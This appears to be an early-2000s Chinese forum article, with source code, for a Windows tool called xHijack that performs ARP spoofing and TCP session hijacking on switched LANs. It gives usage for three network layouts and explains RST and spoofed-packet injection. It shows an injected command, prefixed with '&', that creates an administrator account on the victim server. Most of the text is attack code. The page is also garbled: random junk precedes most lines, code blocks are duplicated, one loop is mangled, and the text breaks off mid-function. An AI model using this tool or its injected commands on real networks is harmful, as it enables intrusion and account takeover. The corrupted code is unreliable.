再谈交换环境下的会话劫持(For windows2000)

韩冰

第一步是开启IP Routing的功能，修改注册表
' ]- \; ~; v: K% G! FHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\IPEnableRouter为0x1，重启系统即可。
第二步是ARP欺骗，具体原理我就不说了。
  r0 L; w4 [: d6 V/ X$ l第三步就是开始劫持啦。

我写了个程序xHijack可以实现第二、三步功能，使用如下:
4 ~7 Z. s9 x, }! C- b
  m0 R& H: P/ e$ W; [8 NUsage: xHijack ServerSide ClientSide

: ?8 U! J9 B4 [$ ^. _1 h( w6 h7 E/ C8 H下面根据三种不同的情况分别说明如何输入参数：
  F4 o" r' x0 G) J3 @<1>服务器、客户端、劫持者处于同一局域网，接在同一交换机上（或交换机级连？）。
/ }$ R$ @$ W: D8 n8 s假如服务器的IP是192.168.0.2，客户端的IP是192.168.0.3，提供如下参数给xHijack即可
2 V- D! o2 ?6 Xc:\>xHijack 192.168.0.2 192.168.0.3
劫持前数据流程：server <--> client
: c  X1 R/ s4 B$ i4 a0 Q! r. m劫持后数据流程：server <--> hijacker <--> client
0 F$ W: Y( u8 _$ ?, j) J4 D6 F
<2>服务器、劫持者处于同一局域网，客户端处于别的网络。
) v! {1 k! L' Q4 v假如服务器IP是202.202.202.2，服务器的网关是202.202.202.1，提供如下参数
xHijack 202.202.202.2 202.202.202.1
劫持前数据流程：server <--> gw <--> routes <--> client
' S1 N4 X( [! U( S) C2 U1 E劫持后数据流程：server <--> hijacker <--> gw <--> routes <--> client
5 f4 ^  Y  a$ R  U1 y  d
  o# [5 O- {- f% N3 M/ Z" H<3>客户端、劫持者处于同一局域网，服务器处于别的网络。
假如客户端的IP是192.168.0.2，网关是192.168.0.1，提供如下参数
8 h9 _9 ?! e1 fxHijack 192.168.0.1 192.168.0.2
0 g; F& d8 k, q/ U劫持前数据流程：client <--> gw <--> routes <--> server
劫持后数据流程：client <--> hijacker <--> gw <--> routes <--> server

输入两个参数后，会提示你选择网卡，然后会提示
: r: Y# ~: s( L# c2 Y& Jl        <-- List all connections
r x       <-- Reset the number x connection
w x       <-- Watch the number x connection
h x command   <-- Hijack the number x connection to execute command
& O* I/ E9 L/ X: p8 X9 q
7 f* P3 J1 ]( x* M! Ilist、reset、watch命令我就不解释了。
+ o' o: P$ i1 D. R$ v假如现在有如下连接
(1) 202.202.202.202:23 <--> 192.168.0.3:2345
我们想要劫持这个连接运行我们的命令，输入
3 q4 F7 s) M7 |* I/ e/ \3 b! vxHijack>h 1 "&net user ey4s hijack /add & net localgroup administrators ey4s /add"
为什么命令前面要加&呢？假如客户刚发送一个字符p过去，我们不加&的话，服务器端接受到的就是
( k* X! g, K+ i. v4 d  h) q& ^pnet user.....了，加了&后就成为p&net user.....，这样就不管前面客户输入了什么，我们的命令
$ V/ `/ E4 x0 K. F3 v都能够运行了。以上都假设服务器是windows 2000，unix下加什么字符，我不知道，我是unix白痴，呵呵。
$ W2 W- f: a" z' U
劫持的流程如下：
( A  ]5 t3 k* S7 W<1>伪装成Server给Client发一个rst包
<2>伪装成Client给Server发了一个数据包
<3>Server回一个ACK包给client
  Y. }  c" p1 x# g5 M5 d+ w<4>因为Cleint的连接已经给我们reset掉了，所以client回一个rst包给server
( o+ y+ J" E' C1 j  X( u6 U2 b
这样的话，我们只能发一个伪造的包，但我想已经足够了。
想要一直劫持那个连接也可以，如下
<1>伪装成Server给Client发一个rst包
<2>欺骗Client，告诉它Server的MAC地址AAAAAAAAAAAA
<3>伪装成Client给Server发了一个数据包
" V% q, n2 w9 y1 k$ C<4>Server回一个ACK包给client
<5>Client回一个rst包给Server，但Server收不到，因为Client发到AAAAAAAAAAAA了，呵呵。
! f" ~* R; w$ |6 o3 G) d1 G: `# R<6>然后Server发给Client的包都由我们来处理，包括给Server回ACK包等等。

不过这样比较危险，在我们劫持的过程中，Client与Server的通讯始终是断开的。
& n" t9 ]6 I6 ^  j5 L
- P/ K4 E, l) [2 L% S7 ~
$ i, @* V/ p, e8 o- ~6 i刚开始看TCP/IP协议，调程序调得头昏脑涨，说明也写的乱七八糟，呵呵，程序代码也可能存在很多问题，
/ z+ o* o* }4 K! q& {还请各位多多指点。

BTW:我没有空间，编译好的程序没地方放：（

0 ^( q4 T' v: J" A

  A9 }/ P1 ^5 W2 T( h# D参考资料
% W$ f. A6 B' {2 V; ?5 ~( O0 E. ^0 }<>交换环境下的会话劫持http://www.xfocus.net/article_view.php?id=375
6 ?5 Y/ o: n: u4 x1 P( N  B' j* g<>交换网络中的嗅探和ARP欺骗http://www.xfocus.net/article_view.php?id=377
5 v/ R/ S% y, b1 Y) u1 B

以下是程序代码
& Z- v1 A$ S) C, ]# E" p----------------------------------------------------------------------
, q, F) u% I. E; l/*-----------------------------------------------------------------------------
" v% }; h8 ]% f2 rFile      : xHijack.c
3 y  D5 B& h& n- _Version      : 1.0
Create at    : 2002/8/12
0 ^9 P4 N$ a! c$ L% r  GLast modifed at  : 2002/8/19
Author      : eyas
Email      : ey4s@21cn.com
HomePage    : www.ey4s.org
感谢refdom和shotgun发布的源代码，使我获益非浅。
If you modify the code, or add more functions, please email me a copy.

备注:
<>没有考虑IP头、TCP头超过20字节的情况
<>没有考虑数据包分片的情况
" o0 e# a7 D6 d; b<>没有对截取到的TCP数据进行解码，如TELNET，虽然是明文传输，但是TCP数据里面包含了
# ?& b7 ^0 a* R- m& q7 e显示格式、位置等信息，直接打印出来，显得很凌乱。但如果是IRC、SMTP、POP3等就没问
题了。

+ p' }7 _+ V) q! ]也许下一版本会修正这些问题，也许不会有下一版本了。

-----------------------------------------------------------------------------*/
0 e* z& X4 S) C6 ~#include
#include
+ n2 N- m9 Y" V6 x$ x- z#include
#include
+ G# h  f; D: {9 S! v1 q#include
; ^8 e$ B1 `* {# U; v& c$ F9 z#include
; _8 _, X3 b2 ?#include
4 C3 ~* S: r+ l: ?/ b) u
#pragma comment (lib, "packet")
; R' i. [9 }* [( c+ D#pragma comment (lib, "iphlpapi")
. P" j+ g4 f1 d$ o  L: k#pragma comment (lib, "ws2_32")
  K$ @2 U- N$ G8 P
9 D2 u$ [4 f3 b- y. D! T; p: q#define Max_Num_Adapter 10
2 j( [( a3 ~3 l4 m, b#define Max_Num_IPAddr  5
#define EPT_IP      0x0800      /* type: IP  */
, t" v' f- N4 X#define ARP_HARDWARE  0x0001      /* Dummy type for 802.3 frames */
. B9 P" f* j( |5 o- ?; C% D#define EPT_ARP      0x0806      /* type: ARP */

#define  ACTION_NONE    0
#define  ACTION_WATCH  1
#define  ACTION_RESET  2
#define ACTION_HIJACK  3
$ a/ a" f+ w6 B" o: `; Q' w
/*以1字节对齐*/
3 o2 U. _7 F! [# u$ w8 u#pragma pack(1)
8 W0 k; Y1 n1 r& Ftypedef struct _ehhdr
{
  unsigned char  DestMAC[6];
  unsigned char  SourceMAC[6];
  unsigned short  EthernetType;
" `8 g$ J/ w1 h! g: |% r/ ^3 P}EHHDR, *PEHHDR;

$ F0 s( q" H. q4 m+ `typedef struct _iphdr        //定义IP首部
{
  unsigned char h_verlen;      //4位首部长度,4位IP版本号
  unsigned char tos;        //8位服务类型TOS
9 j5 K" T/ }: i% D, L9 M  unsigned short total_len;    //16位总长度（字节）
  unsigned short ident;      //16位标识
  unsigned short frag_and_flags;  //3位标志位
+ P! C1 P- n7 `) {$ W  unsigned char ttl;        //8位生存时间 TTL
" y* V& C. r7 _  unsigned char proto;      //8位协议 (TCP, UDP 或其他)
  unsigned short checksum;    //16位IP首部校验和
  unsigned int sourceIP;      //32位源IP地址
  unsigned int destIP;      //32位目的IP地址
: f( o  E* P9 U8 M: R7 C7 |; m}IPHDR, *PIPHDR;
/ [+ B. M- l8 M# H* _+ O5 I$ c! W
; g3 f) [4 x! }( r& O) ytypedef struct _tcphdr        //定义TCP首部
{
  USHORT th_sport;        //16位源端口
  USHORT th_dport;        //16位目的端口
  unsigned int th_seq;      //32位序列号
' K" m- G& q; ^4 D2 J, f  unsigned int th_ack;      //32位确认号
& D- q) y8 Q/ v; w  unsigned char th_lenres;    //4位首部长度/6位保留字
  unsigned char th_flag;      //6位标志位
1 H) O9 n9 \/ k6 `5 _5 O8 Q  USHORT th_win;          //16位窗口大小
  USHORT th_sum;          //16位校验和
" T! a  F" B3 d: O# X: V/ x  USHORT th_urp;          //16位紧急数据偏移量
}TCPHDR, *PTCPHDR;

6 o; R# O$ D6 w7 D; F; O9 e* A: ntypedef struct _psdhdr        //定义TCP pseudo header
1 |5 f! m" ]1 F5 \1 D{               
7 R( z1 ~2 @1 f. H5 [( O5 f  unsigned long saddr;
' \8 A$ M4 P3 I2 b  unsigned long daddr;
1 q/ m" l7 h1 W9 x) Y$ J# @3 a  char mbz;
  char ptcl;
  unsigned short tcpl;
}PSDHDR, *PPSDHDR;

7 ^7 A$ r- j- ]2 g5 vtypedef struct _arphdr
{
  unsigned short  HrdType;//硬件类型
8 ~( d+ W4 h: A2 w* M* ^  unsigned short  ProType;//协议类型
( ^: }* t, D9 _/ b6 {# Z  unsigned char  HrdAddrlen;//硬件地址长度
  unsigned char  ProAddrLen;//协议地址长度
  unsigned short  op;//operation
  unsigned char  SourceMAC[6];/* sender hardware address */
  unsigned long  SourceIP;/* sender protocol address */
* ]: I2 R5 ^) [0 v! Q2 K& Z  unsigned char  DestMAC[6];/* target hardware address */
' c) s" l& j+ l' }6 Z$ g; `  unsigned long  DestIP;/* target protocol address */
}ARPHDR, *PARPHDR;

" D# M) e! D* x: v/ Ktypedef struct _ArpPacket
{
  EHHDR  ehhdr;
0 t  k) M9 I. K3 b% _: O  ARPHDR  arphdr;
}ARPPACKET, *PARPPACKET;

1 T8 w8 G. R  }- J! ]typedef struct _tcppacket
9 j9 N/ a. k& p{
  z/ F$ n9 l- X; ?2 Z  EHHDR  ehhdr;
3 b0 H+ g, r( n. l/ t  IPHDR  iphdr;
- h, @8 T' n: ~3 {4 u4 b  TCPHDR  tcphdr;
- u9 {. R6 O6 E( l$ f}TCPPACKET, *PTCPPACKET;

typedef struct _conninfo
{
9 F7 k# L) U4 K7 C8 |2 }  DWORD  dwServerIP;
  USHORT  uServerPort;
0 l! ?0 N( Y! K3 R* E  i  y7 y  DWORD  dwClientIP;
  USHORT  uClientPort;
* N8 Y+ j8 W9 o7 c8 G# @* s  DWORD  ident;//标识
  BOOL  bActive;
  struct  _conninfo  *Next;
3 n5 e, ^& T# e1 |& i/ ^% }) Y}CONNINFO, *PCONNINFO;
4 _1 S! U1 T) [# N5 u
+ d) I! O& @% H+ D! d3 V8 n& ^# \1 i//定义全局变量

韩冰

unsigned int  g_ServerSideIP,
. T5 ~% f3 ^* A        g_ClientSideIP,
" c6 v2 J2 s7 O! c/ n' `' a) s; K) j        g_OwnIP[Max_Num_IPAddr],//本机IP地址列表
        g_TotalIP = 0;//
' N% n1 z) ~  u! F: |. ]! Punsigned char  g_szOwnMAC[6];//本机MAC地址
; L5 D) K) {" d, p) uunsigned char  g_szClientSideMAC[6];
unsigned char  g_szServerSideMAC[6];
char      g_szTcpFlag[6] = {'F','S','R','P','A','U'};//TCP标志位
LPADAPTER    g_lpAdapter;
& g1 C- t& }) ]$ }( j4 k//1 and 2 is arp spoof thread, 3 is recv packets thread, 4 is interface thread
HANDLE      g_hThread[4];
char      g_szCommand[128];//command to execute after hijack
DWORD      g_dwAction;//action type
  i" J; T1 Q- N5 t6 M, \5 F3 C" oDWORD      g_dwCtrlConn;//action 所控制连接的标识
DWORD      g_ident;//节点标识，递增
PCONNINFO    g_pCurrCtrlConn = NULL,//action当前所控制的连接的信息结构指针
        g_pConnHead = NULL,
0 k, Q, @0 h0 V. m% O        g_pConnLast = NULL;
char      g_szSendPacketBuf[1514];
LPPACKET    g_lpSendPacket;
//函数
2 o6 E8 [( m: K' \void      usage(void);
5 n' S! W* |' }" q% Z: N1 Uvoid      ShowPacketMoreInfo(PTCPPACKET, USHORT, BOOL);
2 E- C" w' F# z. v7 `void      ListAllConnection();//列出当前所有的连接
void      ResetActionAllFlag();
% d" d' x! @5 d) S' FUSHORT      checksum(USHORT *, int);
BOOL      GetMACAddr(DWORD DestIP, char *pMAC);//取得目标IP的MAC地址
BOOL      IsACKPacket(unsigned char);//判断是不是一个纯ack包
LPADAPTER    InitAdapter();//初始化一些参数和全局变量
" Y9 `9 J2 E' w/ H8 Y9 E: {  ?* s4 ^  TBOOL      SendRstPacket(unsigned int, unsigned int);//伪装成server给cilent发送rst包
% Y/ X+ O% B4 GBOOL      SendHiJackPacket(PTCPPACKET);//伪装成client给server发送我们的包
, j  Q: ~9 N& {DWORD      GetConnNum(char *, DWORD, DWORD *);
DWORD      CtrlConnInfoLink(DWORD, USHORT, DWORD, USHORT, BOOL, BOOL);
5 H. z( w' [2 j9 z" zDWORD  WINAPI  ArpSpoofThread(LPVOID);//进行arp欺骗的函数
DWORD  WINAPI  AnalysePacketsThread(LPVOID);//分析处理接收到的包
DWORD  WINAPI  InterfaceThread(LPVOID);//
BOOL  WINAPI  CtrlEvent(DWORD);


$ W$ r$ V- `# ], w, |/ q
int main(int argc, char **argv)
/ ?/ g0 |- x6 T{
  struct    bpf_stat stat;
  int      i;
. f2 c+ S2 i( o$ R" `  u( I; i
$ E: }+ }5 l/ X/ t  usage();
  if (argc != 3) return 0;
  //取得参数
  g_ServerSideIP = inet_addr(argv[1]);
5 n! X$ C+ W( k1 r8 D- o  g_ClientSideIP = inet_addr(argv[2]);
  //初始化adapter & 一些全局变量
( p& p+ s  }0 m6 }3 d2 E  g_lpAdapter = InitAdapter();
" V! l8 I* j- x7 j* T  if(!g_lpAdapter) return 0;
  //get ServerSide MAC & ClientSide MAC
* k) x; K; H; Y0 ~  if(!GetMACAddr(g_ServerSideIP, g_szServerSideMAC)) return 0;
  if(!GetMACAddr(g_ClientSideIP, g_szClientSideMAC)) return 0;
  //create arp spoof thread     
3 O) P1 I8 G; n/ m* {7 i8 L  i = 1;
  g_hThread[0] = CreateThread(NULL, 0, ArpSpoofThread, &i, 0, 0);
  Sleep(500);
  i = 2;
! g' r$ I5 U5 T: j8 H1 K, }' j6 h  g_hThread[1] = CreateThread(NULL, 0, ArpSpoofThread, &i, 0, 0);
  //create analyse packet thread
# r) Z2 ?& [- k. i# S% u  g_hThread[2] = CreateThread(0, 0, AnalysePacketsThread, NULL, 0, 0);
  //create interface thread
# s9 f5 [: e/ B5 L& K' I! f  g_hThread[3] = CreateThread(0, 0, InterfaceThread, NULL, 0, 0);
  //set console ctrl handle
% `. B$ Q) `% T) n  if(!SetConsoleCtrlHandler(CtrlEvent, TRUE))
; D( x9 D( ^% Q9 p7 ^# D  {
# l" S% x) W  h4 l/ B# R9 v) N8 I9 Y4 X    printf("SetConsoleCtrlHandler error:%d\n", GetLastError());
    return 0;
  }
' O4 i, V5 f1 u* Z& C+ V  //wait for any thread exit
( |2 [& H9 ^; I1 O  WaitForMultipleObjects(4, g_hThread, FALSE, INFINITE);
3 j. D9 P. x* q8 \6 c3 N  //print the capture statistics
: g5 B) A' O! a  c  if(PacketGetStats(g_lpAdapter, &stat) == FALSE)
  O6 X7 s% s" P4 M, a! Z. B    printf("Warning: unable to get stats from the kernel!\n");
  else
    printf("\n\n%d packets received.\n%d Packets lost\n",stat.bs_recv,stat.bs_drop);
  //free resource   
  PacketFreePacket(g_lpSendPacket);
  u- b9 a, |$ C  PacketCloseAdapter(g_lpAdapter);
  return 0;
% X7 a1 @7 q+ ]+ y5 ]/ z1 G+ }3 l}

//
//功能：重置所有于ACTION有关的标志
' d, I& r: t& y& s* }. I//

韩冰

unsigned int  g_ServerSideIP,
        g_ClientSideIP,
& x" E9 H* }4 Z, R        g_OwnIP[Max_Num_IPAddr],//本机IP地址列表
9 W# n# e7 S. x7 V4 B        g_TotalIP = 0;//
unsigned char  g_szOwnMAC[6];//本机MAC地址
  @: r& r" [& W4 L/ xunsigned char  g_szClientSideMAC[6];
  Y  m$ }" B5 A' vunsigned char  g_szServerSideMAC[6];
3 {* ?2 E4 V! P) nchar      g_szTcpFlag[6] = {'F','S','R','P','A','U'};//TCP标志位
LPADAPTER    g_lpAdapter;
//1 and 2 is arp spoof thread, 3 is recv packets thread, 4 is interface thread
HANDLE      g_hThread[4];
char      g_szCommand[128];//command to execute after hijack
DWORD      g_dwAction;//action type
DWORD      g_dwCtrlConn;//action 所控制连接的标识
& k9 H% O- \  B1 j/ zDWORD      g_ident;//节点标识，递增
, i+ Z! I4 A2 f0 `PCONNINFO    g_pCurrCtrlConn = NULL,//action当前所控制的连接的信息结构指针
        g_pConnHead = NULL,
5 Y$ c/ k; T- K) K3 y9 G. l# f        g_pConnLast = NULL;
char      g_szSendPacketBuf[1514];
LPPACKET    g_lpSendPacket;
& B3 C7 \- O2 L//函数
9 R. A) p2 U( |! k9 |! E5 h8 R  }$ V- t* jvoid      usage(void);
void      ShowPacketMoreInfo(PTCPPACKET, USHORT, BOOL);
void      ListAllConnection();//列出当前所有的连接
void      ResetActionAllFlag();
USHORT      checksum(USHORT *, int);
' q# i9 z3 R* Y& k9 b# V- XBOOL      GetMACAddr(DWORD DestIP, char *pMAC);//取得目标IP的MAC地址
BOOL      IsACKPacket(unsigned char);//判断是不是一个纯ack包
LPADAPTER    InitAdapter();//初始化一些参数和全局变量
" @) l. f, ~# ~# I) O% @- o) {BOOL      SendRstPacket(unsigned int, unsigned int);//伪装成server给cilent发送rst包
4 B" V5 a& @( g6 y: a$ uBOOL      SendHiJackPacket(PTCPPACKET);//伪装成client给server发送我们的包
DWORD      GetConnNum(char *, DWORD, DWORD *);
8 T% c# E- v# W4 K/ p8 d8 l3 tDWORD      CtrlConnInfoLink(DWORD, USHORT, DWORD, USHORT, BOOL, BOOL);
DWORD  WINAPI  ArpSpoofThread(LPVOID);//进行arp欺骗的函数
: v) D( v# |0 A! u: r. Z( }$ [DWORD  WINAPI  AnalysePacketsThread(LPVOID);//分析处理接收到的包
DWORD  WINAPI  InterfaceThread(LPVOID);//
BOOL  WINAPI  CtrlEvent(DWORD);



) ?1 @2 f  ?3 l7 e3 `$ J- Iint main(int argc, char **argv)
9 L6 x, Y; k& L' m: v" N* N* m{
  struct    bpf_stat stat;
6 T- J5 C7 p/ q7 p1 ^  int      i;

  usage();
  if (argc != 3) return 0;
8 L. W. z/ o! K/ h. R& G) }  //取得参数
6 v4 h6 R: |9 w: V( f% W6 g  g_ServerSideIP = inet_addr(argv[1]);
  g_ClientSideIP = inet_addr(argv[2]);
  //初始化adapter & 一些全局变量
  g_lpAdapter = InitAdapter();
  if(!g_lpAdapter) return 0;
$ \8 X$ q5 f8 f1 |& y  X9 E3 q  //get ServerSide MAC & ClientSide MAC
  if(!GetMACAddr(g_ServerSideIP, g_szServerSideMAC)) return 0;
4 |' o( S* e% y$ Z5 Z+ k  if(!GetMACAddr(g_ClientSideIP, g_szClientSideMAC)) return 0;
  //create arp spoof thread     
  i = 1;
  g_hThread[0] = CreateThread(NULL, 0, ArpSpoofThread, &i, 0, 0);
  Sleep(500);
  i = 2;
  g_hThread[1] = CreateThread(NULL, 0, ArpSpoofThread, &i, 0, 0);
  //create analyse packet thread
! I8 u: h) [; N6 u- {+ i2 p  [  g_hThread[2] = CreateThread(0, 0, AnalysePacketsThread, NULL, 0, 0);
  //create interface thread
2 v9 m4 M& t6 W) B9 M+ k  g_hThread[3] = CreateThread(0, 0, InterfaceThread, NULL, 0, 0);
+ G* J1 M5 {  ~8 @* i! E  //set console ctrl handle
- D# c% L, M7 P' L8 K! w& ?  if(!SetConsoleCtrlHandler(CtrlEvent, TRUE))
  {
    printf("SetConsoleCtrlHandler error:%d\n", GetLastError());
3 S# I- t) G7 I5 X# N3 `0 G+ B    return 0;
5 w! y7 Q' m8 U3 y2 u  `8 B+ `  }
) l2 G1 U* l2 c  //wait for any thread exit
- z3 N" k" G3 B& q0 E  WaitForMultipleObjects(4, g_hThread, FALSE, INFINITE);
  //print the capture statistics
  if(PacketGetStats(g_lpAdapter, &stat) == FALSE)
    printf("Warning: unable to get stats from the kernel!\n");
  else
7 |5 y: P& f. ~5 g4 p' \, A" P    printf("\n\n%d packets received.\n%d Packets lost\n",stat.bs_recv,stat.bs_drop);
$ p' `4 C6 K! Z( x) {  //free resource   
  PacketFreePacket(g_lpSendPacket);
  PacketCloseAdapter(g_lpAdapter);
  return 0;
8 u/ C" K- C  o( ~; Z* V# s}

0 [( S& G4 R8 V  ^//
' Y5 j2 r# H, o//功能：重置所有于ACTION有关的标志
+ q5 B2 ]2 G: o" V+ N$ \//

韩冰

void ResetActionAllFlag()
' ^5 @9 m5 ?1 Z3 r! @% w1 s{
* ?- `! f% n; q" V1 [' r2 o" a  g_dwCtrlConn = 0;
  g_pCurrCtrlConn = NULL;
" n' b+ F' [4 p4 v# `2 [  g_dwAction = ACTION_NONE;
  L: H! }6 j8 t. x. Y6 j, r}
, V% F' L. B. [7 {- o: @# V
//
//功能：处理Ctrl+C和Ctrl+Break事件
//
0 t' }( L$ X. R; U0 \% h% HBOOL WINAPI CtrlEvent(DWORD dwCtrlType)
$ \& v2 F8 g. A+ c{
6 r, B4 C4 K+ s; e( R  switch(dwCtrlType)
  {
    case CTRL_BREAK_EVENT:
! y3 B+ o$ C4 z3 w" e( {      //reset action all flag
      ResetActionAllFlag();
      break;
* z, P# C* L. b% S4 x$ V, \    case CTRL_C_EVENT:
- E5 }. C/ S$ u0 b: s7 C7 d      //terminate all thread
; g7 q; ]* Y# ]+ |3 G      TerminateThread(g_hThread[0], 0);
: u# z. S0 V0 |+ _6 g      TerminateThread(g_hThread[1], 0);
, F7 h' D7 h5 |* E5 y7 L* {" d# [: i      TerminateThread(g_hThread[2], 0);
1 R) v! G/ R, ^( B      TerminateThread(g_hThread[3], 0);
      break;
    default:
      break;
  C7 ]$ t. K  A1 j5 z! u  }
- f' ]* |- O  Q+ V7 U  return TRUE;
}
2 z( w" {5 y! \  {6 T
( ?( f2 {. h0 Y8 L' q//
//功能：处理用户输入
//
DWORD GetConnNum(char *szStr, DWORD dwLen, DWORD *lpCommandPos)
{
3 L+ V$ i  q7 E1 N2 u  DWORD  i;
  char  szBuff[16];

  *lpCommandPos = 0;
  \& J* G" L$ L1 j2 Y2 M  for(i=0; i<15, i代码比较乱
/ h4 T9 P' k7 u8 @//
DWORD WINAPI InterfaceThread(LPVOID lp)
{
3 P0 O9 _  W6 Q* b  char  szHelp[] =  "l\t\t<-- List all connections\n"
) S" d! z! Z# s2 Q) X# D" i            "r x\t\t<-- Reset the number x connection\n"
5 Y1 @6 B$ c. }: e9 {$ h* n            "w x\t\t<-- Watch the number x connection\n"
            "h x command\t<-- Hijack the number x connection to execute command\n"
            "[Note]\n"
9 {8 a: K1 S5 E+ N% |+ G9 P2 L            "Ctrl+Break to clear all action\n"
  o$ C3 r3 Z$ [( u/ Q            "Ctrl+C to exit\n";
  char  szPrompt[] = "\nxHijack>";
3 i6 [- w3 c6 l& H/ N, P  char  szBuffer[128];
  ]. {, b) D: ?+ @! X6 K  DWORD  dwPos;
6 K  v5 @& |2 b5 Y5 O  PCONNINFO  pTmp;
: v: Q* j8 x5 M5 }2 q' ]  B
  while(1)
  {
9 d; G. O* t+ ^* c    gets(szBuffer);//不考虑buffer overflow
9 l7 [" J' U. L8 F: F0 r* t' G; L    switch(szBuffer[0])
    {
      case 'l':
7 D! l- `( k- F; E) m. \      case 'L':
        ListAllConnection();
' P5 r, ?) G* n        break;
      case 'r':
      case 'R':
* a4 [1 S! r$ @: i$ t. B        if(strlen(szBuffer) >2)
6 `: t8 a" F3 v        {
* M6 o$ N- a8 D8 |" W$ ]( D          g_dwCtrlConn = GetConnNum(&szBuffer[2], strlen(szBuffer) - 2, &dwPos);
          g_dwAction = ACTION_RESET;
- i! u0 b1 Q2 L2 Q' l1 h" J        }
2 p+ v- g5 d% r' ^$ v% q        else printf("%s", szHelp);
        break;
* [; [9 f1 |7 x      case 'w':
* X9 O! C( k: U* T9 g6 D5 o      case 'W':
; Z6 S5 D, a$ @5 z" _5 O4 ]        if(strlen(szBuffer) > 2)
% t, n8 F/ t+ _7 M        {
* C3 Q6 x0 S9 E0 C          g_dwCtrlConn = GetConnNum(&szBuffer[2], strlen(szBuffer) - 2, &dwPos);
          g_dwAction = ACTION_WATCH;
        }
        else printf("%s", szHelp);
        break;
      case 'h':
      case 'H'://h 1 xxx
+ }9 x. e5 Z: c# v; w        if(strlen(szBuffer) > 5)
0 w; r0 a' L  l" m0 ?5 `3 w        {
          g_dwCtrlConn = GetConnNum(&szBuffer[2], strlen(szBuffer) - 2, &dwPos);
. @, X, D) D0 f. q          //如果command第一个字符是'或"
: q2 U9 n- g) h4 m2 R! G          if( (szBuffer[2+dwPos+1] == '\'') || (szBuffer[2+dwPos+1] == '\"') )
          {
( z  Y7 ?+ \9 ?+ A  R8 T" I            strncpy(g_szCommand, &szBuffer[2+dwPos+1+1], sizeof(g_szCommand) - 3);
/ P# [% I$ @- t- s! A6 Z8 h  K4 b            g_szCommand[strlen(g_szCommand) - 1] = 0x0;//去掉最后一个'或"
          }
          else strncpy(g_szCommand, &szBuffer[2+dwPos+1], sizeof(g_szCommand) - 3);
          strcat(g_szCommand, "\x0D\x0A");
          g_dwAction = ACTION_HIJACK;
( n2 f# i- {: L+ h; @5 A+ q/ D        }
5 y6 d4 u4 d* \: U        else printf("%s", szHelp);
* ]0 K2 F  V2 @: W        break;
& n; N8 R: [2 I      default:
% z1 t5 p2 E8 {* i, t* o, y        printf("%s", szHelp);
        break;
    }//end of switch
    //find the specify ident's struct point
; W, ]- B- H0 c! Y2 ^% O    if( (g_dwCtrlConn) && (g_dwAction) )
% D( t* Q: }4 W7 o    {
      g_pCurrCtrlConn = NULL;
/ i  ]$ t# ]/ H. m$ e4 t7 l" U) P      pTmp = g_pConnHead;
      while(pTmp)
      {
) o) n3 o! g7 y1 H  b; U1 @        if((pTmp->ident == g_dwCtrlConn) && (pTmp->bActive) )
5 S- X% r6 d6 o- P0 P  v, i) O        {
. B6 m$ Q2 u; d/ @( ]5 r1 i          g_pCurrCtrlConn = pTmp;
, o& }: R- B$ o; V: `3 Y7 O, E          break;
        }
        pTmp = pTmp->Next;
      }
& i8 u7 H+ T/ z' j      if(!g_pCurrCtrlConn)
      {
        printf("Can't find the number %d connection.\n", g_dwCtrlConn);
        //reset action all flag
- K5 m# a$ o' e8 s% Y        ResetActionAllFlag();      
2 p9 A6 [; m; x6 r5 i$ q      }
5 q. \6 P& Z, S2 ]6 [( K# G) T    }
    if(!g_dwCtrlConn) ResetActionAllFlag();
    //显示当前用户所期望的动作
    printf("\nCurrentAction:");
' _- P8 f/ |; `  w0 i$ n    switch(g_dwAction)
    {
      case ACTION_WATCH:
' }1 e* Q) ~! l        printf("ACTION_WATCH");
        break;
, {" u6 b) G) T. C+ u# N+ l      case ACTION_RESET:
1 v. T7 {! @. v8 V9 G$ u, [: |        printf("ACTION_RESET");
        break;
      case ACTION_HIJACK:
5 K) D: `- J+ s. S8 z' \        printf("ACTION_HIJACK");
- Q9 t9 T" k6 {) R        break;
/ E" \7 x7 E9 R      default:
+ j7 e1 p+ H; o- U        printf("ACTION_NONE");
        break;
    }
    printf("\tCurrentCtrlConn:%d%s", g_dwCtrlConn, szPrompt);
  }//enf of while
. F  C6 n  y: ^' _* D+ h  return 0;
}

韩冰

// //功能：列出当前所有连接 // 1 Q* _5 x1 F- I, D" R9 w( mvoid ListAllConnection() { 6 ~+ Z6 n5 s& U" Q/ Z3 R5 F2 G5 w PCONNINFO pTmp; + {$ s% r) ]8 n- y# y SOCKADDR_IN saDest, saSource; pTmp = g_pConnHead; while(pTmp) ; @6 ~. e7 ?( ?/ e- z( d { if(pTmp->bActive) W! k v$ G) d, y, e! J+ g { ! `* P# m4 X8 _9 U saSource.sin_addr.s_addr = pTmp->dwServerIP; saDest.sin_addr.s_addr = pTmp->dwClientIP; ) |6 p& ^$ u, O7 y$ W, ?! _1 N4 t printf("(%d) %s:%d <--> ", pTmp->ident, inet_ntoa(saSource.sin_addr), ntohs(pTmp->uServerPort)); printf("%s:%d\n", inet_ntoa(saDest.sin_addr), ntohs(pTmp->uClientPort)); 8 [! Z: \; k( n/ B5 w. B1 D* M0 {' C: { } pTmp = pTmp->Next; , k+ l( x$ Z$ U7 F% b3 \# v7 p } } % |$ R4 q4 S, z0 {- U 4 g3 ~! R$ q6 R+ q: p0 S& q% b' y0 u9 S// //功能：初始化一些数据，取得指定网卡的MAC地址和所有IP地址 2 o) ]/ V' z5 X8 q9 {# ~5 H" E4 K' N// & M! |' L) u4 a$ {. t& {LPADAPTER InitAdapter() { : ^: B* u& k$ U LPADAPTER lpAdapter; static char AdapterList[Max_Num_Adapter][1024]; char szSelectAdapterName[512]; WCHAR AdapterName[2048]; 9 ~1 J' F1 x+ B( Z. C WCHAR *temp,*temp1; ULONG AdapterLength = 1024; int iAdapterNum = 0; 0 t" b( N2 F b' o# U& {$ W int iRetCode, i; $ Y9 }8 H$ [, ~0 v$ b% G3 A int iAdapter = 0; 5 x+ E$ x) ^- ^% v ULONG ulLen = 0; DWORD dwRet; PIP_ADAPTER_INFO pAdapterInfo = NULL, pTmp; PIP_ADDR_STRING pIPAddr; - [5 {1 ~+ |' p5 m //Get The list of Adapter ; \5 V) w" O$ D6 j7 Z0 s if(PacketGetAdapterNames((char*)AdapterName, &AdapterLength) == FALSE) { % C% z% V2 ~8 J5 N* q" ~" o( c. F3 h printf("Unable to retrieve the list of the adapters!\n"); " E( @3 \- s" ?- t9 k return 0; ; ]1 U. h: V1 B- w4 h# K0 S } temp = temp1 = AdapterName; i = 0; while ((*temp != '\0')||(*(temp-1) != '\0')) $ @/ j, m0 _$ x* C { % `) d$ k5 [- Z6 ?. x7 k9 L if (*temp == 